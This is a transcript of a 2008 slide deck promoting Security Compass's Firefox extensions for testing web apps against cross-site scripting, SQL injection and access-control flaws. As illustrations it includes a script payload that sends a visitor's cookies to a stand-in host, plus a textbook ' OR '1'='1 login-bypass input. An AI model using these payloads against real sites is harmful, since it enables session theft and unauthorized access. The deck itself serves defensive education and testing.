© 2008 security compass inc. 1 firefox plug-ins for application penetration testing exploit-me
TRANSCRIPT
© 2008 Security Compass inc. © 2008 Security Compass inc. 1
Firefox Plug-ins for Application Penetration Testing
Exploit-Me
© 2008 Security Compass inc.
• Tom Aratyn–Software Developer at Security
Compass–Developed the Exploit Me tools
Who are we?
2
© 2008 Security Compass inc.
• Jamie–Security Consultant for Security
Compass–Background in security research,
penetration testing, and software development
Who are we?
3
© 2008 Security Compass inc.
• Cross-site scripting, really a danger?
• State of web application security• XSS-Me• SQL Inject-Me• Access Me
Agenda
4
© 2008 Security Compass inc.
• We know XSS can be dangerous, but can we use it to rob a bank?–AJAX + CSRF + XSS = Major
problem
XSS – Really a Danger?
5
© 2008 Security Compass inc.
• Reflected–Spit back as soon as it goes in–XSS-Me helps here
• Stored–Saving it for someone else–XSS-Me future version
Two Exciting Flavours
6
© 2008 Security Compass inc.
• Un-validated user input executed by the users computer
• JavaScript is typically used–PDF files are XSS-able
• Someone took my cookie
What is this XSS Stuff
7
<SCRIPT>location.href=“http://10.1.1.1/cgi-bin/steal.cgi?”+
escape(document.cookie);</SCRIPT>
<SCRIPT>location.href=“http://10.1.1.1/cgi-bin/steal.cgi?”+
escape(document.cookie);</SCRIPT>
© 2008 Security Compass inc.
• AJAX is adding a new element into these attacks–AJAX was used in the IBDBank
attack• Attacker can play with data as if
the victim is doing it–Send–Receive–Parse
Someone Changed my App
8
© 2008 Security Compass inc.
State of Web App Insecurity
9
• Web app exploits outnumber buffer overflows in CVE
• Large portion of web apps suffer from XSS or SQL Injection
© 2008 Security Compass inc.
• Various tools exist–OWASP tools,
commercial, Open Source
• Work very well–For what they
were built to do
Testing Tools
10
© 2008 Security Compass inc.
• Most tools not for developers or QA
• Developers and QA must be checking for security vulnerabilities
• Need lightweight tools
The Missing Piece
11
© 2008 Security Compass inc.
• Firefox extension to test for cross-site scripting
XSS-Me 0.4 to the Rescue
12
© 2008 Security Compass inc.
• Pick forms & fields to test• Firefox 3• Import/export/add/remove XSS
strings• Test & Surf• Heuristics to limit tests
XSS-Me Features
13
© 2008 Security Compass inc.
• Checking all attacks against all fields is slow.–No, trust me, it’s slow
• Heuristic tests limit the fields we have to check by determining if we can inject them–Passes set of characters and
checks if they’re returned (;\/<>=‘”)
Heuristics?
14
© 2008 Security Compass inc.
• Attempts to set document.vulnerable=true into the DOM
• If property set, attack worked• Also checks for plain text string,
a potential vulnerability–OnMouseOver injection
Behind the Magic
15
© 2008 Security Compass inc.
• Everyone says use Struts to protect yourself–Sure, just don’t follow the supplied
examples
Thank $deity for Struts
16
© 2008 Security Compass inc.
Being Bobby
17
sql = “SELECT * FROM users WHERE username = ‘” & Request(“username”) & “’ AND password = '" & Request(“password”) & "'"
User Input:username = jimmypassword = blah’ OR ‘1’=‘1
SELECT * FROM users WHERE username = ‘jimmy’ AND password = ‘blah’ OR ‘1’=‘1’
Since “WHERE 1=1” is true for all records the entire table is returned!
Courtesy XKCD.com
© 2008 Security Compass inc.
• Defence is well known and faster than what you’re doing now–Prepared Statements–Stored Procedure
• Ok, if you use exec in your procedure this is also vulnerable, but, you’re not doing that right?
No Excuse
18
© 2008 Security Compass inc.
• Firefox extension to check for SQL injection
SQL Inject-Me 0.4
19
© 2008 Security Compass inc.
• Pick what you test• Configure attack and success
strings• Large default string set• Firefox 3• Test & Surf
SQL Inject-Me Features
20
© 2008 Security Compass inc.
• Web/application servers maybe vulnerable to HTTP Verb Tampering attacks
• Bypasses common authorization configurations
What’s your method
21
© 2008 Security Compass inc.
Access Me 0.2
22
• Firefox extension to check for authentication issues
© 2008 Security Compass inc.
• Checks for unauthenticated access vulnerabilities
• Checks for HTTP verb vulnerabilities
• Regular expression based parameter detection
• Automatic test as you surf
Access Me Features
23
© 2008 Security Compass inc.
Detecting Access Vulnerabilities
24
• Failed if response status is 200 and response too similar
• Warning if response status is 200 or response too similar
© 2008 Security Compass inc.
• Available off of our website–www.securitycompass.com
• Extra XSS-Me attack strings also available from site
• Open sourced under GPL v3
Where can you get ‘em
25
© 2008 Security Compass inc.
• May include–Spidering
• Stored attacks
The Future...
26